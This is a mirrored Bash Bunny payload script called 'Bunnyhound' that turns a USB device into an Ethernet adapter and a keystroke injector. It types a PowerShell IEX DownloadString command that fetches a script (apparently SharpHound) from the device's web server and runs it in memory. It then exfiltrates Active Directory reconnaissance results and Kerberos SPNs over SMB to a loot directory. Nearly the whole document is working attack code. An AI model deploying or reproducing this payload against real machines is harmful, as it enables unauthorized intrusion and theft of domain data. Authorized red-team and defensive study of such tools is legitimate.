mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
72 lines
1.5 KiB
Bash
72 lines
1.5 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Bunnyhound
|
|
# Author: golem445
|
|
# Version: 1.0
|
|
# Dependencies: Impacket, gohttp
|
|
# Runtime: Dependent on domain size
|
|
#
|
|
# Description:
|
|
# Sets up Ethernet and HID keyboard interfaces simultaneously,
|
|
# then uses HID to import Sharphound into memory via local
|
|
# web server and execute the attack. Results are exported
|
|
# to the loot directory via SMB.
|
|
#
|
|
# LEDS:
|
|
# Magenta: Setup
|
|
# Yellow Blinking: Attack Phase 1
|
|
# Yellow Double Blinking: Attack Phase 2
|
|
# White Rapid Blinking: Cleaning Up
|
|
# Green: Attack Finished
|
|
#
|
|
# Start Setup
|
|
LED SETUP
|
|
|
|
# Check dependencies
|
|
REQUIRETOOL impacket gohttp
|
|
GET SWITCH_POSITION
|
|
|
|
# Temporary loot directory
|
|
mkdir -p /loot/smb/
|
|
|
|
# Permanent loot directory
|
|
mkdir -p /root/udisk/loot/bunnyhound_exfil/
|
|
|
|
# Set interfaces
|
|
ATTACKMODE RNDIS_ETHERNET HID
|
|
|
|
# Start web server
|
|
cd /root/udisk/payloads/$SWITCH_POSITION
|
|
gohttp -p 80 &
|
|
|
|
# Start SMB Server
|
|
python /tools/impacket/examples/smbserver.py s /loot/smb &
|
|
|
|
# Start attack
|
|
LED ATTACK
|
|
RUN WIN powershell
|
|
Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
|
|
Q ENTER
|
|
|
|
# Wait until files are done copying.
|
|
LED STAGE2
|
|
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
|
|
|
# Start Cleanup
|
|
LED CLEANUP
|
|
|
|
# Delete Exfil file
|
|
rm /loot/smb/EXFILTRATION_COMPLETE
|
|
|
|
# Move Kerberos SPNS to permanent loot directory
|
|
mv /loot/smb/* /root/udisk/loot/bunnyhound_exfil/
|
|
|
|
# Clean up temporary loot directory
|
|
rm -rf /loot/smb/*
|
|
|
|
# Sync file system
|
|
sync
|
|
|
|
# Complete
|
|
LED FINISH
|